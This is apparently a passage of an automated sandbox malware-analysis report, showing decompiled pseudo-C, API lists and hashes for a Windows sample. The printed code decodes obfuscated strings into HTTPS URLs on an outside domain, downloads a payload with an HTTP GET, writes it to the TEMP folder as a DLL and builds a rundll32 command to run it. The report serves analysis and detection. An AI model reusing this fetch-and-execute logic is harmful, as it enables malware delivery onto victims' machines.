                                                                                                                            0x00401774
                                                                                                                            0x00401779
                                                                                                                            0x00401784
                                                                                                                            0x0040178c
                                                                                                                            0x00401794
                                                                                                                            0x0040179c
                                                                                                                            0x004017a4
                                                                                                                            0x004017ae
                                                                                                                            0x004017b3
                                                                                                                            0x004017b7
                                                                                                                            0x004017bd
                                                                                                                            0x004017c1
                                                                                                                            0x004017cb
                                                                                                                            0x004017cf
                                                                                                                            0x004017d8
                                                                                                                            0x004017dd
                                                                                                                            0x004017e1
                                                                                                                            0x004017e6
                                                                                                                            0x004017eb
                                                                                                                            0x004017f0
                                                                                                                            0x004017f4
                                                                                                                            0x004017f9
                                                                                                                            0x004017fe
                                                                                                                            0x00401803
                                                                                                                            0x00401807
                                                                                                                            0x0040180c
                                                                                                                            0x00401811
                                                                                                                            0x00401815
                                                                                                                            0x0040181a
                                                                                                                            0x0040181e
                                                                                                                            0x0040182d
                                                                                                                            0x00401838

                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32 ref: 0040177E
                                                                                                                            • GetProcAddress.KERNEL32(?,75BBB980), ref: 004017AC
                                                                                                                            • GetProcAddress.KERNEL32 ref: 00401823
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: A$D$ExW$F$G$M$N$S$Shel$U$W$cute$d$e$e$e$e$e$e$f$i$lExe$m$n$o$t$t$u$y
                                                                                                                            • API String ID: 190572456-2298969562
                                                                                                                            • Opcode ID: b0c0be28e60a583f3c10d0103c3c71b170fc56e059e92503629a07c38952569a
                                                                                                                            • Instruction ID: 2aac5bb5d94e6c403b262512d8e8667abf0c6541f0c157898e9e82351163e768
                                                                                                                            • Opcode Fuzzy Hash: b0c0be28e60a583f3c10d0103c3c71b170fc56e059e92503629a07c38952569a
                                                                                                                            • Instruction Fuzzy Hash: 7241D46140D3C0DDD352CB69848474BFFE15BAA608F88198DF1D85B392C2BA9658CB7B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401DF0 Relevance: 52.8, APIs: 13, Strings: 17, Instructions: 259memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 23%
                                                                                                                            			E00401DF0(void* __ecx, void* __ebp, intOrPtr _a4) {
				char _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				intOrPtr _v112;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				char _v668;
				char _v676;
				intOrPtr _v680;
				char _v684;
				intOrPtr _v688;
				char _v692;
				intOrPtr _v696;
				char _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr* _v712;
				char _v716;
				intOrPtr _v720;
				short _v724;
				char _v728;
				char _v732;
				intOrPtr _v736;
				short _v740;
				char _v744;
				char _v748;
				intOrPtr _v752;
				char _v756;
				intOrPtr* _v760;
				intOrPtr _v768;
				char _v780;
				intOrPtr _v792;
				intOrPtr _v804;
				intOrPtr _v816;
				intOrPtr _v828;
				intOrPtr _v840;
				char _v856;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t94;
				signed int _t96;
				intOrPtr _t99;
				signed int _t104;
				short _t107;
				intOrPtr _t111;
				signed int _t113;
				intOrPtr* _t116;
				void* _t119;
				intOrPtr _t141;
				void* _t142;
				void* _t143;
				intOrPtr _t144;
				intOrPtr* _t145;
				void* _t146;
				short _t151;
				void* _t179;
				intOrPtr _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t183;
				void* _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr* _t192;
				intOrPtr* _t193;
				void* _t194;
				char* _t196;
				void* _t197;
				intOrPtr* _t198;
				void* _t202;
				signed int _t203;

				_t143 = __ecx;
				_push(0xffffffff);
				_push(E00432341);
				_push( *[fs:0x0]);
				_t203 = _t202 - 0x2a4;
				_t94 =  *0x441590; // 0x4917eadc
				_v16 = _t94 ^ _t203;
				_push(_t179);
				_t96 =  *0x441590; // 0x4917eadc
				_push(_t96 ^ _t203);
				 *[fs:0x0] =  &_v12;
				_t99 = _a4;
				_t192 = __imp__#2;
				_v676 = 0;
				_v684 = 0;
				if(_t99 != 0) {
					L4:
					_t141 =  *_t192(_t99);
					_v652 = _t141;
					if(_t141 != 0) {
						goto L2;
					}
					E00401480(_t141, _t143, _t179, _t192, 0x8007000e);
					goto L6;
				} else {
					_t141 = 0;
					_v648 = 0;
					L2:
					_v8 = 0;
					_t192 =  *_t192("GET");
					_v680 = _t192;
					if(_t192 != 0) {
						L6:
						_push( &_v692);
						_push(0x438890);
						_push(0x17);
						_v12 = 1;
						_t144 =  *0x445274;
						_t165 =  *((intOrPtr*)(_t144 + 0x44));
						_push(0);
						_push(0x4388a0);
						if( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0x44))))() >= 0) {
							_t180 =  *0x4427e0; // 0x0
							_t145 = _v712;
							_t203 = _t203 - 0x10;
							_t104 = _t203;
							 *_t104 = _t180;
							_t181 =  *0x4427e4; // 0x0
							 *((intOrPtr*)(_t104 + 4)) = _t181;
							_t182 =  *0x4427e8; // 0x80020004
							 *((intOrPtr*)(_t104 + 8)) = _t182;
							_t183 =  *0x4427ec; // 0x0
							_push(_t141);
							_push(_t192);
							 *((intOrPtr*)(_t104 + 0xc)) = _t183;
							_push(_t145);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t145 + 0x24))))() >= 0) {
								_t185 =  *0x4427e0; // 0x0
								_t151 = _v740;
								_t203 = _t203 - 0x10;
								_t113 = _t203;
								 *_t113 = _t185;
								_t186 =  *0x4427e4; // 0x0
								 *((intOrPtr*)(_t113 + 4)) = _t186;
								_t187 =  *0x4427e8; // 0x80020004
								 *((intOrPtr*)(_t113 + 8)) = _t187;
								_t188 =  *0x4427ec; // 0x0
								 *((intOrPtr*)(_t113 + 0xc)) = _t188;
								_push(_t151);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x34))))() >= 0) {
									_t116 = _v760;
									 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x38))))(_t116,  &_v716);
									if(_v724 == 0xc8) {
										_t119 = E00401DA0(_t141,  &_v748, _v768);
										_v88 = 2;
										if(_v748 == 0x2011) {
											__imp__#17(_v740);
											if(_t119 == 1) {
												__imp__#20(_v744, _t119,  &_v732);
												__imp__#19(_v756, 1,  &_v780);
												_v792 = _v792 + 1;
												__imp__#23(_v768,  &_v780);
												_t190 = _v112;
												_v728 = 0x620064;
												_v724 = 0x64002e;
												_v720 = 0x740061;
												_v716 = 0;
												_v744 = 0x620064;
												_v740 = 0x64002e;
												_v736 = 0x6c006c;
												_v732 = 0;
												_t196 =  &_v728;
												if(_t190 != 1) {
													_t196 =  &_v744;
												}
												_push(0x104);
												_push( &_v656);
												_v756 = 0x450054;
												_v752 = 0x50004d;
												_v748 = 0;
												_push( &_v756);
												if( *((intOrPtr*)( *((intOrPtr*)( *0x445274 + 0x20))))() != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *0x445274 + 0x30))))( &_v668, 0x438884);
													 *((intOrPtr*)( *((intOrPtr*)( *0x445274 + 0x30))))( &_v676, _t196);
													_t196 =  &_v684;
												}
												if(_t190 == 2) {
													_v724 = 0x750072;
													_v720 = 0x64006e;
													_v716 = 0x6c006c;
													_v712 = 0x320033;
													_v708 = 0x65002e;
													_v704 = 0x650078;
													_v700 = 0x220020;
													_v696 = 0x730025;
													_v692 = 0x2c0022;
													_v688 = 0x6c0067;
													_v684 = 0x62006f;
													_v680 = 0x6c0061;
													_v676 = 0;
													wsprintfW(0x445278,  &_v724, _t196);
													_t203 = _t203 + 0xc;
												}
												_t197 =  *((intOrPtr*)( *((intOrPtr*)( *0x445274 + 0x34))))(_t196, 0x40000000, 0, 0, 2, 0x80, 0);
												if(_t197 != 0xffffffff) {
													 *((intOrPtr*)( *((intOrPtr*)( *0x445274 + 0x38))))(_t197, _v828, _v840 - _v804,  &_v700, 0);
													_v856 = 1;
													 *((intOrPtr*)( *((intOrPtr*)( *0x445274 + 0x2c))))(_t197);
												}
												__imp__#24(_v816);
											}
										}
										_v88 = 1;
										__imp__#9( &_v748);
										_t192 = _v760;
									}
								}
							}
							_t107 = _v740;
							_t146 =  *_t107;
							_t165 =  *((intOrPtr*)(_t146 + 8));
							 *((intOrPtr*)( *((intOrPtr*)(_t146 + 8))))(_t107);
							_t193 = __imp__#6;
							 *_t193(_t192);
							 *_t193(_t141);
							_t111 = _v744;
						} else {
							_t198 = __imp__#6;
							 *_t198(_t192);
							 *_t198(_t141);
							_t111 = 0;
						}
						 *[fs:0x0] = _v80;
						_pop(_t184);
						_pop(_t194);
						_pop(_t142);
						return E0041D773(_t111, _t142, _v84 ^ _t203, _t165, _t184, _t194);
					} else {
						_t99 = E00401480(_t141, _t143, _t179, _t192, 0x8007000e);
						goto L4;
					}
				}
			}


















































































                                                                                                                            0x00401df0
                                                                                                                            0x00401df0
                                                                                                                            0x00401df2
                                                                                                                            0x00401dfd
                                                                                                                            0x00401dfe
                                                                                                                            0x00401e04
                                                                                                                            0x00401e0b
                                                                                                                            0x00401e15
                                                                                                                            0x00401e16
                                                                                                                            0x00401e1d
                                                                                                                            0x00401e25
                                                                                                                            0x00401e2b
                                                                                                                            0x00401e32
                                                                                                                            0x00401e3c
                                                                                                                            0x00401e40
                                                                                                                            0x00401e44
                                                                                                                            0x00401e6e
                                                                                                                            0x00401e71
                                                                                                                            0x00401e75
                                                                                                                            0x00401e79
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401e80
                                                                                                                            0x00000000
                                                                                                                            0x00401e46
                                                                                                                            0x00401e46
                                                                                                                            0x00401e48
                                                                                                                            0x00401e4c
                                                                                                                            0x00401e51
                                                                                                                            0x00401e5a
                                                                                                                            0x00401e5e
                                                                                                                            0x00401e62
                                                                                                                            0x00401e85
                                                                                                                            0x00401e89
                                                                                                                            0x00401e8a
                                                                                                                            0x00401e8f
                                                                                                                            0x00401e91
                                                                                                                            0x00401e99
                                                                                                                            0x00401e9f
                                                                                                                            0x00401ea2
                                                                                                                            0x00401ea3
                                                                                                                            0x00401eac
                                                                                                                            0x00401ec1
                                                                                                                            0x00401ec7
                                                                                                                            0x00401ecd
                                                                                                                            0x00401ed0
                                                                                                                            0x00401ed2
                                                                                                                            0x00401ed4
                                                                                                                            0x00401eda
                                                                                                                            0x00401edd
                                                                                                                            0x00401ee3
                                                                                                                            0x00401ee6
                                                                                                                            0x00401eec
                                                                                                                            0x00401eed
                                                                                                                            0x00401eee
                                                                                                                            0x00401ef4
                                                                                                                            0x00401ef9
                                                                                                                            0x00401eff
                                                                                                                            0x00401f05
                                                                                                                            0x00401f0b
                                                                                                                            0x00401f0e
                                                                                                                            0x00401f10
                                                                                                                            0x00401f12
                                                                                                                            0x00401f18
                                                                                                                            0x00401f1b
                                                                                                                            0x00401f21
                                                                                                                            0x00401f24
                                                                                                                            0x00401f2a
                                                                                                                            0x00401f30
                                                                                                                            0x00401f35
                                                                                                                            0x00401f3b
                                                                                                                            0x00401f4a
                                                                                                                            0x00401f54
                                                                                                                            0x00401f62
                                                                                                                            0x00401f67
                                                                                                                            0x00401f76
                                                                                                                            0x00401f81
                                                                                                                            0x00401f8a
                                                                                                                            0x00401f9b
                                                                                                                            0x00401fad
                                                                                                                            0x00401fb7
                                                                                                                            0x00401fc2
                                                                                                                            0x00401fc8
                                                                                                                            0x00401fdc
                                                                                                                            0x00401fe0
                                                                                                                            0x00401fe4
                                                                                                                            0x00401fec
                                                                                                                            0x00401ff0
                                                                                                                            0x00401ff4
                                                                                                                            0x00401ff8
                                                                                                                            0x00402000
                                                                                                                            0x00402004
                                                                                                                            0x00402008
                                                                                                                            0x0040200a
                                                                                                                            0x0040200a
                                                                                                                            0x00402014
                                                                                                                            0x00402020
                                                                                                                            0x00402025
                                                                                                                            0x0040202d
                                                                                                                            0x00402035
                                                                                                                            0x0040203c
                                                                                                                            0x00402041
                                                                                                                            0x00402059
                                                                                                                            0x0040206d
                                                                                                                            0x0040206f
                                                                                                                            0x0040206f
                                                                                                                            0x00402079
                                                                                                                            0x0040208a
                                                                                                                            0x00402095
                                                                                                                            0x004020a0
                                                                                                                            0x004020ab
                                                                                                                            0x004020b6
                                                                                                                            0x004020c1
                                                                                                                            0x004020cc
                                                                                                                            0x004020d7
                                                                                                                            0x004020e2
                                                                                                                            0x004020ed
                                                                                                                            0x004020f8
                                                                                                                            0x00402103
                                                                                                                            0x0040210e
                                                                                                                            0x00402115
                                                                                                                            0x0040211b
                                                                                                                            0x0040211b
                                                                                                                            0x00402139
                                                                                                                            0x0040213e
                                                                                                                            0x00402160
                                                                                                                            0x0040216c
                                                                                                                            0x00402174
                                                                                                                            0x00402174
                                                                                                                            0x0040217b
                                                                                                                            0x0040217b
                                                                                                                            0x00401f8a
                                                                                                                            0x00402186
                                                                                                                            0x0040218e
                                                                                                                            0x00402194
                                                                                                                            0x00402194
                                                                                                                            0x00401f54
                                                                                                                            0x00401f35
                                                                                                                            0x00402198
                                                                                                                            0x0040219c
                                                                                                                            0x0040219e
                                                                                                                            0x004021a2
                                                                                                                            0x004021a5
                                                                                                                            0x004021ab
                                                                                                                            0x004021ae
                                                                                                                            0x004021b0
                                                                                                                            0x00401eae
                                                                                                                            0x00401eaf
                                                                                                                            0x00401eb5
                                                                                                                            0x00401eb8
                                                                                                                            0x00401eba
                                                                                                                            0x00401eba
                                                                                                                            0x004021bb
                                                                                                                            0x004021c3
                                                                                                                            0x004021c4
                                                                                                                            0x004021c6
                                                                                                                            0x004021db
                                                                                                                            0x00401e64
                                                                                                                            0x00401e69
                                                                                                                            0x00000000
                                                                                                                            0x00401e69
                                                                                                                            0x00401e62

                                                                                                                            APIs
                                                                                                                            • SysAllocString.OLEAUT32(GET), ref: 00401E58
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00401E6F
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00401EB5
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00401EB8
                                                                                                                            • SafeArrayGetDim.OLEAUT32(?), ref: 00401F81
                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000000,?), ref: 00401F9B
                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00401FAD
                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00401FC2
                                                                                                                            • wsprintfW.USER32 ref: 00402115
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 0040217B
                                                                                                                            • VariantClear.OLEAUT32(00002011), ref: 0040218E
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004021AB
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004021AE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ArraySafe$Free$AllocBoundData$AccessClearUnaccessVariantwsprintf
                                                                                                                            • String ID: $"$%$.$3$GET$M$T$a$a$g$l$l$n$o$r$x
                                                                                                                            • API String ID: 1460184929-2887097305
                                                                                                                            • Opcode ID: cb68ef04ca1c7cf419b7565e2eb29cb0b70201813ed32cf521c1671b3b985c26
                                                                                                                            • Instruction ID: a71fdfeb184b4642e22957a9082ada8f52235a7095ca95693affb2ab27587a9e
                                                                                                                            • Opcode Fuzzy Hash: cb68ef04ca1c7cf419b7565e2eb29cb0b70201813ed32cf521c1671b3b985c26
                                                                                                                            • Instruction Fuzzy Hash: CAB189756043409FD320DF64C988A5BBBE9FBC9304F50896EF588972A1C7B5E844CF96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004021E0 Relevance: 45.6, APIs: 1, Strings: 25, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 88%
                                                                                                                            			E004021E0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				signed int _v8;
				char _v528;
				short _v532;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				char _v600;
				short _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				short _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char _v664;
				short _v668;
				void* __ebp;
				signed int _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t47;
				void* _t49;
				void* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t67;

				_t66 = (_t64 & 0xfffffff8) - 0x298;
				_t40 =  *0x441590; // 0x4917eadc
				_v8 = _t40 ^ _t66;
				_v668 = 0x740068;
				_v616 = 0x740068;
				_v604 = 0x740068;
				_t43 =  *0x4428dc; // 0x17
				_v628 = 0x6d006f;
				_v564 = 0x6d006f;
				_v632 = 0x63002e;
				_v568 = 0x63002e;
				_v664 = 0x700074;
				_v660 = 0x3a0073;
				_v656 = 0x2f002f;
				_v652 = 0x2e0076;
				_v648 = 0x790078;
				_v644 = 0x67007a;
				_v640 = 0x6d0061;
				_v636 = 0x760065;
				_v624 = 0x25002f;
				_v620 = 0x2e0064;
				_v612 = 0x6c006d;
				_v608 = 0;
				_v600 = 0x700074;
				_v596 = 0x3a0073;
				_v592 = 0x2f002f;
				_v588 = 0x2e0076;
				_v584 = 0x790078;
				_v580 = 0x67007a;
				_v576 = 0x6d0061;
				_v572 = 0x760065;
				_v560 = 0x6c002f;
				_v556 = 0x67006f;
				_v552 = 0x6e0069;
				_v548 = 0x68002e;
				_v544 = 0x6d0074;
				_v540 = 0x6c;
				wsprintfW( &_v532,  &_v668, _t43);
				_t45 =  *0x445274;
				_t55 =  *((intOrPtr*)(_t45 + 0x28));
				_t67 = _t66 + 0xc;
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x28))))(0);
				do {
					_push(1);
					_t47 = E00401DF0(_t55, _t63,  &_v528);
					_t67 = _t67 + 8;
				} while (_t47 == 0);
				do {
					_push(2);
					_t49 = E00401DF0(_t55, _t63,  &_v600);
					_t67 = _t67 + 8;
					_t70 = _t49;
				} while (_t49 == 0);
				return E0041D773(E00401840(_t55, _t63, _t70), __ebx, _v4 ^ _t67,  &_v528, __edi, __esi);
			}


















































                                                                                                                            0x004021e6
                                                                                                                            0x004021ec
                                                                                                                            0x004021f3
                                                                                                                            0x00402204
                                                                                                                            0x00402207
                                                                                                                            0x0040220b
                                                                                                                            0x0040220f
                                                                                                                            0x00402219
                                                                                                                            0x0040221d
                                                                                                                            0x00402226
                                                                                                                            0x0040222a
                                                                                                                            0x00402237
                                                                                                                            0x0040223f
                                                                                                                            0x00402247
                                                                                                                            0x0040224f
                                                                                                                            0x00402257
                                                                                                                            0x0040225f
                                                                                                                            0x00402267
                                                                                                                            0x0040226f
                                                                                                                            0x00402277
                                                                                                                            0x0040227f
                                                                                                                            0x00402287
                                                                                                                            0x0040228f
                                                                                                                            0x00402297
                                                                                                                            0x0040229f
                                                                                                                            0x004022a7
                                                                                                                            0x004022af
                                                                                                                            0x004022b7
                                                                                                                            0x004022bf
                                                                                                                            0x004022c7
                                                                                                                            0x004022cf
                                                                                                                            0x004022d7
                                                                                                                            0x004022df
                                                                                                                            0x004022e7
                                                                                                                            0x004022f2
                                                                                                                            0x004022fd
                                                                                                                            0x00402308
                                                                                                                            0x00402313
                                                                                                                            0x00402319
                                                                                                                            0x0040231e
                                                                                                                            0x00402321
                                                                                                                            0x00402326
                                                                                                                            0x00402330
                                                                                                                            0x00402337
                                                                                                                            0x0040233a
                                                                                                                            0x0040233f
                                                                                                                            0x00402342
                                                                                                                            0x00402346
                                                                                                                            0x0040234a
                                                                                                                            0x0040234d
                                                                                                                            0x00402352
                                                                                                                            0x00402355
                                                                                                                            0x00402355
                                                                                                                            0x0040236f

                                                                                                                            APIs
                                                                                                                            • wsprintfW.USER32 ref: 00402313
                                                                                                                              • Part of subcall function 00401DF0: SysAllocString.OLEAUT32(GET), ref: 00401E58
                                                                                                                              • Part of subcall function 00401DF0: SysAllocString.OLEAUT32(?), ref: 00401E6F
                                                                                                                              • Part of subcall function 00401DF0: SysFreeString.OLEAUT32(00000000), ref: 00401EB5
                                                                                                                              • Part of subcall function 00401DF0: SysFreeString.OLEAUT32(00000000), ref: 00401EB8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocFree$wsprintf
                                                                                                                            • String ID: .$/$/$/$/$a$a$d$e$e$i$l$m$o$s$s$t$t$t$v$v$x$x$z$z
                                                                                                                            • API String ID: 2290494786-2497699671
                                                                                                                            • Opcode ID: 144a9522ac747857fab23f734924204924eae2336a26b2e1bbac6834f1addf2a
                                                                                                                            • Instruction ID: 58064605eaea1fee8fa2aed83dc6fa3099d8acea92122c810c74de6444696d9b
                                                                                                                            • Opcode Fuzzy Hash: 144a9522ac747857fab23f734924204924eae2336a26b2e1bbac6834f1addf2a
                                                                                                                            • Instruction Fuzzy Hash: FC3139B0518380CFD710DF11D44976BBFE2BB89788F408A2DB5885B361D7BA8588CF96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401600 Relevance: 43.8, APIs: 5, Strings: 20, Instructions: 74libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E00401600(struct HINSTANCE__** __esi) {
				signed int _v4;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				void* __edi;
				signed int _t44;
				void* _t59;

				_t68 =  &_v40;
				_t44 =  *0x441590; // 0x4917eadc
				_v4 = _t44 ^  &_v40;
				__esi[0xd] = GetProcAddress( *__esi, "CreateFileW");
				_v36 = 0x69;
				_v34 = 0x69;
				_v31 = 0x69;
				_v35 = 0x74;
				_v20 = 0x74;
				_v8 = 0x74;
				_v29 = 0x65;
				_v21 = 0x65;
				_v9 = 0x65;
				_v40 = 0x43;
				_v39 = 0x6f;
				_v38 = 0x49;
				_v37 = 0x6e;
				_v33 = 0x61;
				_v32 = 0x6c;
				_v30 = 0x7a;
				_v28 = 0;
				_v24 = 0x43;
				_v23 = 0x6f;
				_v22 = 0x53;
				_v19 = 0x50;
				_v18 = 0x72;
				_v17 = 0x6f;
				_v16 = 0x78;
				_v15 = 0x79;
				_v14 = 0x42;
				_v13 = 0x6c;
				_v12 = 0x61;
				_v11 = 0x6e;
				_v10 = 0x6b;
				_v7 = 0;
				__esi[0xf] = GetProcAddress(__esi[3],  &_v24);
				__esi[0xa] = GetProcAddress(__esi[3],  &_v40);
				__esi[0x11] = GetProcAddress(__esi[3], "CoCreateInstance");
				__esi[0xe] = GetProcAddress( *__esi, "WriteFile");
				return E0041D773(_t57, _t59, _v4 ^ _t68,  &_v40, GetProcAddress, __esi);
			}






































                                                                                                                            0x00401600
                                                                                                                            0x00401603
                                                                                                                            0x0040160a
                                                                                                                            0x0040161f
                                                                                                                            0x00401626
                                                                                                                            0x0040162a
                                                                                                                            0x0040162e
                                                                                                                            0x00401634
                                                                                                                            0x00401638
                                                                                                                            0x0040163c
                                                                                                                            0x00401646
                                                                                                                            0x0040164a
                                                                                                                            0x0040164e
                                                                                                                            0x00401657
                                                                                                                            0x0040165c
                                                                                                                            0x00401660
                                                                                                                            0x00401665
                                                                                                                            0x0040166a
                                                                                                                            0x0040166f
                                                                                                                            0x00401674
                                                                                                                            0x00401679
                                                                                                                            0x0040167e
                                                                                                                            0x00401683
                                                                                                                            0x00401687
                                                                                                                            0x0040168c
                                                                                                                            0x00401691
                                                                                                                            0x00401696
                                                                                                                            0x0040169a
                                                                                                                            0x0040169f
                                                                                                                            0x004016a4
                                                                                                                            0x004016a9
                                                                                                                            0x004016ae
                                                                                                                            0x004016b3
                                                                                                                            0x004016b8
                                                                                                                            0x004016bd
                                                                                                                            0x004016c8
                                                                                                                            0x004016d2
                                                                                                                            0x004016e0
                                                                                                                            0x004016f4
                                                                                                                            0x004016ff

                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(4917EADC,CreateFileW), ref: 0040161D
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004016C2
                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 004016D0
                                                                                                                            • GetProcAddress.KERNEL32(?,CoCreateInstance), ref: 004016DE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 004016EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc
                                                                                                                            • String ID: B$C$C$CoCreateInstance$CreateFileW$I$P$S$WriteFile$a$a$k$l$l$n$n$r$x$y$z
                                                                                                                            • API String ID: 190572456-3706152365
                                                                                                                            • Opcode ID: 7144d0e339db0450546708c7da5d3af2b4ea5f0a03d66689be829d44ac0cc660
                                                                                                                            • Instruction ID: faabc37f6aa09c853779bae209ad0238bf0d97ddd44ca80e5549c9e39eced2a6
                                                                                                                            • Opcode Fuzzy Hash: 7144d0e339db0450546708c7da5d3af2b4ea5f0a03d66689be829d44ac0cc660
                                                                                                                            • Instruction Fuzzy Hash: BE31D66150D3C0DDD312DB69844474BFFE55FAA608F488D8DF0C997292C2B9E648CB6B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

